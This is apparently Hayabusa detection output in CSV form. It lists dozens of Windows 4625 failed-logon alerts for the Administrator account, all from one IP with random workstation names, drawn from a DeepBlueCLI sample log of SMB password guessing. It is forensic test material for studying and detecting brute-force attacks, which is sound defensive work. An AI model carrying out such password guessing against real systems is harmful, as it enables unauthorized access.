2016-09-20 01:50:12.536 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AfOOiR2zO5xem9Tk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.582 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yiGtitRqZbGNKrtN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.623 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7oQ70LvSMnGxBCFO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JGHr8623vHZyMY5B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.707 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X5Y1C9A4XqxQGoVA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SOnirLGOZzRVSt3y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.772 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jLu7XtYCHPqVNE7u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.811 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w242Ei1CpWErEE4m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.847 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UOZUagVG4R6zcK92 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.891 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7hQOl8XV3Ydp8UcW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.927 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u1XBRDfoN0I2iu6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.963 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ngyknhk7uGvs38bG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:12.996 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QXZUhLVsfRUBDcsu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.045 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VEDAtkhiSqUcLj2i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M4CmH02M91kHzeK2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.125 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5St1kWrKP4PZlOIy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 17A6k4Om84gunQfB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.195 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y9GfR4XdixrNJHny | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 27JWPfEV4DgS1tNv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yNeJnXg1pyedSpqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.324 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WWihv14n9IAQXw2X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gy19bFWzQFaQZRBa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.412 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N28Ec4jkXkSNvsQ1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.447 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sD9qQWJbeukyPQbc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.487 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uoRSHXvwMeKg8cyQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bPEOhloL7vo1fTFQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: glbLglffka5JqQCN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7MTbgvYN6PIaKxeK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tAjWfgmGrm3o2mAx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.683 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9EZYPG6uQtsez1UI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PRcnsdLAKd7enemG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.759 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OUZEQaUavv7fWk4w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JKth56VEMqMCgwG9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.834 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TCGlvOFFkVpSHSoM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jmLxSIastsvqdJC8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.895 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IPyvUDHHWzbhyvZE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.935 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S7dF4fIlAvIBYiw0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:13.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bPDPtH2m9TgW8Khg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AChGHCNom0ds5ujV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8sLQI4KGgQRq2Sy9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dqeLFLRT5EXiCBUC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dx3tco9up7XnOa7h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.159 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZdNX4ubtpQaV9EeF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.189 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S05I0ZlGKGazkVkL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pzbfrYSYhxH6WcCt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.304 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZGTvXs8Mlc0Fi7iT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.345 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C1LjtTFjPfPlBqAi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1lhJW3iO1xGGTMhp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.427 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IMz7WmlBTgadVgN8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OB02epCA5pc5oBeJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.503 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KAFgReUMtu9VerRl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.543 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ByeL26yQfohpQT3z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 527r3nh9ocmItXfL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HNeC1BBFVXv839Ys | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.673 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: juXXpQcoPfJLMQ3L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.708 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: njNdv4lGnsUpooCP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j6VchLhWJT7cCWVR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.788 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r3xxnFpbd8zkFm0h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jtf156NEpOebQHGC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 17O1jfGX6KQMPgnD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.905 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3NaqTqrCiPPfNxZF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.950 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Az7cwIWXUGVIMTv5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Djaxf99PVs2VkMy6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rbTSoTdaQ0Y4c9Gw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g9aTo4QBHfrgPYZ2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dpHKjYzZTn0ruIrf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HqhPnV6tc8airRqu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.211 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RIOCqtXh5ji12U5q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.254 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RwuGZ0kgg1yToLlr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.289 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZSBbd4qBRuzeKBjD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8zS1Muxc9gpcqv23 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c6wiIkfkgtso42P1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q1ilRmhSB5RfvpVa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PuQ47GGBraimypWL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
